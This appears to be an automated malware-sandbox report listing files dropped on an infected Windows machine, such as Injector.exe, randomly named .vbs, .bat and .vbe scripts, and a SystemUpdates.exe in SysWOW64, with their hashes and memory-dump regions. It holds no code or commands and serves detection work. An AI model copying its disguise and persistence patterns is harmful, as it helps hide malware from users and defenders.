                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              152B

                                              MD5

                                              02a4b762e84a74f9ee8a7d8ddd34fedb

                                              SHA1

                                              4a870e3bd7fd56235062789d780610f95e3b8785

                                              SHA256

                                              366e497233268d7cdf699242e4b2c7ecc1999d0a84e12744f5af2b638e9d86da

                                              SHA512

                                              19028c45f2e05a0cb32865a2554513c1536bf9da63512ff4e964c94a3e171f373493c7787d2d2a6df8012648bbefab63a9de924f119c50c39c727cf81bdc659f

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              152B

                                              MD5

                                              826c7cac03e3ae47bfe2a7e50281605e

                                              SHA1

                                              100fbea3e078edec43db48c3312fbbf83f11fca0

                                              SHA256

                                              239b1d7cc6f76e1d1832b0587664f114f38a21539cb8548e25626ed5053ea2ab

                                              SHA512

                                              a82f3c817a6460fd8907a4ac6ab37c2129fb5466707edcfb565c255680d7f7212a5669fe2a42976150f16e4e549ea8310078f22ed35514ee1b7b45b46d8cc96e

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              152B

                                              MD5

                                              f029fd80ed7e0562543d6c6f18773551

                                              SHA1

                                              0da9349739a50cf72bbd5dcaab59449da631d011

                                              SHA256

                                              5e260ce3bb8162ed5e9658a6ff5c25145cffcb7bf0f26362e84529a43b73af87

                                              SHA512

                                              eb3d5b381fbae23f7e6619110d874396e97cf5c0ad022180444cf621d737c5f5bd312709db18f23e924021d7dbd8ccb1f13c02a885443f8f6d554397de4fb52e

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                              Filesize

                                              5KB

                                              MD5

                                              92a2bfa904f8bb8efee185182656ebcb

                                              SHA1

                                              d2d850d2a2b8afac5010da65438a66cd1e0ad15b

                                              SHA256

                                              56709bdc038dbc65d3a7fa4b746f30b85d35e6b3c4c1e17183c115d337380ce9

                                              SHA512

                                              2b83ab5e9665ee372bb769b8b88785035a615b508cdb40bbce982fc547c6c4fff1da214b923511e3257830917c1728031a2d94254d6033919717c8fc69277c92

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                              Filesize

                                              5KB

                                              MD5

                                              ab062f9ef9a9c0919d4c349324734a46

                                              SHA1

                                              a705bb97970bf6174e3d5e4d0636dda714c1e5a9

                                              SHA256

                                              439281d5c9561777324265134aa59398e72765229edf6f1981ccb65fe555fed0

                                              SHA512

                                              8c71624c490ad25ad385cd250ed3fe5902aeacb5ab7f68cbd8414ce7e24ec75f6b0a778c6733339613ab297a3710053daad89ec752de57ececffe8982c2f09b8

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                              Filesize

                                              5KB

                                              MD5

                                              4cf35e1034411f9c5e22074da7ea1547

                                              SHA1

                                              ae12d645e4ccdef5f1eca5ecce7bcb21a15b5022

                                              SHA256

                                              f2134f3be4bc8ea3181dd68088a83978d9e7ad04dc372ef8f0176cf84349e8ee

                                              SHA512

                                              2f351e85324c4e31dfde1e0aabd11afb71d3c064f4a5e6974dd996ca64ab156e7db33cdb13c764f96fcf68d725a72be50195f8c5236734f6ece5bccfd30ce7f8

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                              Filesize

                                              16B

                                              MD5

                                              46295cac801e5d4857d09837238a6394

                                              SHA1

                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                              SHA256

                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                              SHA512

                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                              Filesize

                                              16B

                                              MD5

                                              206702161f94c5cd39fadd03f4014d98

                                              SHA1

                                              bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                              SHA256

                                              1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                              SHA512

                                              0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                              Filesize

                                              11KB

                                              MD5

                                              03bda1dea7b909971e65f2ce9b899f16

                                              SHA1

                                              4498582a16e881869783846e172fc6403296433a

                                              SHA256

                                              2bc7815289d7babbde35a0beef6693216b35d57c047e2ce63f3b7b179a4ed3de

                                              SHA512

                                              0e9a3ae471174b020ea22d1663db472eab07d71a402a855df3907adb3d48f40fdb84c57cf05730838e6c8adddbc4c1dce81e1d085969cc2695686a841038e218

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                              Filesize

                                              11KB

                                              MD5

                                              0d356119e675ea686f9931b0b0f5aea7

                                              SHA1

                                              3ddd96102e547d8913bfa6817bbb2d8157e64cfe

                                              SHA256

                                              e5f9bd44a70ce160c963301db400ec62209840a2b83288772eb8762bc897a642

                                              SHA512

                                              6f7b8ac5b649157d8292261ecc0ab674d09544f99af1f0e0cc534d99c39ba7a5d193d359672a6748719200924b5749dfbe0e9b5b1db4adf664e0c5669648bb44

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                              Filesize

                                              264KB

                                              MD5

                                              8aeda5572fe1b28118a339a06fee04ea

                                              SHA1

                                              9a99bf5f327234f2a6056814464324d9e80344c3

                                              SHA256

                                              ef1b305f51fcd459d889fd23909c4ff8cb4a57a735ef20e68d1c415fb3b62894

                                              SHA512

                                              fefcef58121ed4428e55b6fd2514b2eae9206293ad7d9dd518e88fe7edee5359789593b1c880fa876a63a994f10712bfe786abdca06cb8c2d9613eb971cecafc

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              944B

                                              MD5

                                              6903d57eed54e89b68ebb957928d1b99

                                              SHA1

                                              fade011fbf2e4bc044d41e380cf70bd6a9f73212

                                              SHA256

                                              36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

                                              SHA512

                                              c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              944B

                                              MD5

                                              dc4dd6766dd68388d8733f1b729f87e9

                                              SHA1

                                              7b883d87afec5be3eff2088409cd1f57f877c756

                                              SHA256

                                              3407d8ad0c68a148aef81c7f124849573ac02097acd15f9bbe80f86e0498e826

                                              SHA512

                                              3084c1b7bb0fd998cddb8c917bac87f163a0f134a420158db4f354cb81ec1d5d65d3bac1d9b3e11b0a6707deacece47f819b1ed55ddf2b1d287fbdb244bf65a4

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              944B

                                              MD5

                                              7d760ca2472bcb9fe9310090d91318ce

                                              SHA1

                                              cb316b8560b38ea16a17626e685d5a501cd31c4a

                                              SHA256

                                              5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4

                                              SHA512

                                              141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              944B

                                              MD5

                                              408641808e457ab6e23d62e59b767753

                                              SHA1

                                              4205cfa0dfdfee6be08e8c0041d951dcec1d3946

                                              SHA256

                                              3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

                                              SHA512

                                              e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

                                            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\VV0OCZTA\www.bing[1].xml

                                              Filesize

                                              328B

                                              MD5

                                              205fe816d12a65d4348f574dc10e2bbc

                                              SHA1

                                              c6cf9c9995cdd32a7bd60627ee7a913e05850b86

                                              SHA256

                                              9cc1a77926fe1a8fe7cd3476b4f24f894e06420ce847f1bfceb86333cf599d4e

                                              SHA512

                                              8d34bbf27c61965ee36d3e1db5ed0ad97adaf3ef271e93efb1c068f578f1ed8cb9908061461ee4d53281d701d865b13417e7bc9b23d1a85497fbeb3522b9b271

                                            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\VV0OCZTA\www.bing[1].xml

                                              Filesize

                                              15KB

                                              MD5

                                              be044f10e61f86e32812f5b990ce1134

                                              SHA1

                                              f22914fe19ad3ac62155e132e0a3628250e8b0bf

                                              SHA256

                                              722eec55f610a6602ed617a9bf1cc7055fcc355c662911ad04a8e8301d3fbbee

                                              SHA512

                                              122a6f946cb8d925bf5142fa3d7831a1713f596b92602648279f0040b7023eb969cc0cbd86da14f5175f8014d489fc624309379eb7faf3923fb8e969a726219c

                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe

                                              Filesize

                                              93KB

                                              MD5

                                              358b0c4e6149fa783c37d963a0630047

                                              SHA1

                                              ce7ef081d4e782b22ecf15ca096d90561403bc60

                                              SHA256

                                              a530485ad896b0192ea934f8ac93279ed1c73320779b6a448ac8e5862e9faf0c

                                              SHA512

                                              37f6d2187b68cb2d2db5e8385e369e5ec0bb461164646df77b44b07fb9471de507dfe1350083084bd848ea15063ec285a2545c3adabc7851249db22b27cde560

                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe

                                              Filesize

                                              1.9MB

                                              MD5

                                              e659b7e15ff77b76ae1ca12de1b83419

                                              SHA1

                                              d0fae57f6cb00bea8292eb160d9940a441aa7f7e

                                              SHA256

                                              f70bf625085dfece9e5ea39f44319e36deec706dcebc0ca95fc0483d79ddf6ad

                                              SHA512

                                              c65d52d4f59c68cb51e84c5dd00fc2772956d55fa5f43d518d75d3e36fb8e57bf0ef74ec5bd0a0e205fa52d99202a1faa2f9bec0ad6c7f7c1e654f0f945895d2

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnofoc1h.dvo.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                            • C:\Users\Admin\AppData\Local\Temp\bfb84b27-316d-47b6-a319-30e6d6186c3e.vbs

                                              Filesize

                                              489B

                                              MD5

                                              cc852a292718203e6cb671cb75f5f4ea

                                              SHA1

                                              07eb3536ec0833a5a4e7f1505a22c36b838cc4d2

                                              SHA256

                                              f6d031adb82bf3cc90bca4c8147a0ccd0cb6a121fa2f2952012d7c4e4efd7713

                                              SHA512

                                              bda1d86b1216986f6b84fefc4b501b1f1e088cee425e49dd12627f87d4f6d489bbc53e00468a5d847b9f98b14f44260b0e179ced9a2d7f6285e347f096f2bf4d

                                            • C:\Users\Admin\AppData\Local\Temp\da189635-e194-4091-ac06-732c716850a2.vbs

                                              Filesize

                                              713B

                                              MD5

                                              29848c15fddc614e4846279a61919765

                                              SHA1

                                              2156b54b8a37906da66419b080318d095e3f3503

                                              SHA256

                                              84a2bbad38b675c4bf06696c7f0ce7e7c68bd529984f141d124a51aac7cb5cb1

                                              SHA512

                                              50dd34d9d93ef2427bb69ca7df664870d80b2376d139a76b1ce8a9c2058be779a794782efead99ecb2b70e00b42ab47cc4159764af6e4edd13b89c9ed557203f

                                            • C:\Users\Admin\AppData\Local\Temp\qzqLwOyuSO.bat

                                              Filesize

                                              267B

                                              MD5

                                              a481dec15f01a60497bcd18e0ba26788

                                              SHA1

                                              a032069f65fe8077c690a4237b71e918be779730

                                              SHA256

                                              c76cb4c6b83cdce275244eaf01fc01a2d3b6f7486830cba37965dafe2b432c89

                                              SHA512

                                              768cd03539f2a85426910eadbc66b98180370f982013087c74fe4e0840244e508d841dbc0c33ca1fb37f3a62761633ff69845143f13c9ad07aff669e49305105

                                            • C:\Users\Default\SendTo\121e5b5079f7c0

                                              Filesize

                                              164B

                                              MD5

                                              69df9d1cf82f91bec9a60fa60bad6896

                                              SHA1

                                              2427acb1541949045762ccf94eb302180badd278

                                              SHA256

                                              bc5b89888805e1fb14c422eebcd0161b7f9806a86d3b65bb1032eb34fed95e64

                                              SHA512

                                              716fc1724dc834eb3419af16cfb3ea7659899b0c01b6792558aad1c1333da3ad251c55e65bf0252aba75209a9f99d0bec8ed09b7cddcd74ff4bc38b9ed500737

                                            • C:\Windows\SysWOW64\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat

                                              Filesize

                                              151B

                                              MD5

                                              1a0f2f949a4c977ca148b7e1184e2e2b

                                              SHA1

                                              d78e290750d6853e40ef64db981ec4e5bba28766

                                              SHA256

                                              52c9d9f06608d68d470d89950315033cb377efba6a64e2fb4498d52648225e25

                                              SHA512

                                              63f672ea105fb80655eae026f87d9944870c264eeaa6e9a5479e7dfbe76d91e4e7f0125b56349cbbdad032503936eb2598287aac74af725b0c811a35b582c2c9

                                            • C:\Windows\SysWOW64\Pj3sASAQmYbZO22AgnND3YNrHBGc.vbe

                                              Filesize

                                              223B

                                              MD5

                                              6612f9c7e9436f5d51e7df6f409985f7

                                              SHA1

                                              dea060fb3044be174fb983960ab43eaeeba35ef3

                                              SHA256

                                              4a0840ee7da759b66e13978fcc0beddcc85e40fc2cd83e919c9850017031f390

                                              SHA512

                                              648561fb34133feb0d14be666111ce53a472e35ed37080a68c4f7eba37c0a4f501229ffbf6ea97970f005cda34741fa290e4494c573b1a3c1e4b2a250e551b93

                                            • C:\Windows\SysWOW64\SystemUpdates.exe

                                              Filesize

                                              1.5MB

                                              MD5

                                              e75407ce1b2b4c1ba30e962aba6ba641

                                              SHA1

                                              fec41afd8f8a3734e771c9b161dd872fba6e1377

                                              SHA256

                                              f6bb9ad12d8ea272e48d60a9be80abc44643b16e0934f490ebcb92c1f41bbdf7

                                              SHA512

                                              5bab00725900278d5952ccf2e5e95c454a2004a272c186b2f3707ce703a55c9fff846c72f0d04dcf898a0fb31d0cb3f9ea32e0ffb12c689113e899902e61b596

                                            • memory/1032-478-0x000001E843100000-0x000001E843200000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-540-0x000001E875710000-0x000001E875730000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/1032-621-0x000001E87B480000-0x000001E87B580000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-542-0x000001E8774F0000-0x000001E877510000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/1032-541-0x000001E8777C0000-0x000001E8778C0000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-498-0x000001E864C00000-0x000001E864D00000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-454-0x000001E843100000-0x000001E843200000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1668-71-0x0000025FAB080000-0x0000025FAB0A2000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/4100-33-0x0000000002C90000-0x0000000002CAC000-memory.dmp

                                              Filesize

                                              112KB

                                            • memory/4100-38-0x0000000002E80000-0x0000000002E8C000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/4100-37-0x0000000002E70000-0x0000000002E7A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4100-32-0x0000000000990000-0x0000000000B20000-memory.dmp

                                              Filesize

                                              1.6MB

                                            • memory/4100-45-0x000000001BF80000-0x000000001BF88000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-43-0x000000001BF60000-0x000000001BF6A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4100-35-0x0000000002CC0000-0x0000000002CC8000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-48-0x000000001BFC0000-0x000000001BFCC000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/4100-47-0x000000001BFB0000-0x000000001BFBA000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4100-36-0x0000000002CD0000-0x0000000002CE6000-memory.dmp

                                              Filesize

                                              88KB

                                            • memory/4100-34-0x000000001BDC0000-0x000000001BE10000-memory.dmp

                                              Filesize

                                              320KB

                                            • memory/4100-42-0x000000001B8A0000-0x000000001B8A8000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-40-0x000000001B880000-0x000000001B88C000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/4100-41-0x000000001B890000-0x000000001B898000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-39-0x000000001B870000-0x000000001B878000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-44-0x000000001BF70000-0x000000001BF7E000-memory.dmp

                                              Filesize

                                              56KB

                                            • memory/4100-46-0x000000001BF90000-0x000000001BF9E000-memory.dmp

                                              Filesize

                                              56KB

                                            • memory/4320-188-0x0000000020B30000-0x0000000021058000-memory.dmp

                                              Filesize

                                              5.2MB

                                            • memory/4320-187-0x000000001FC60000-0x000000001FE22000-memory.dmp

                                              Filesize

                                              1.8MB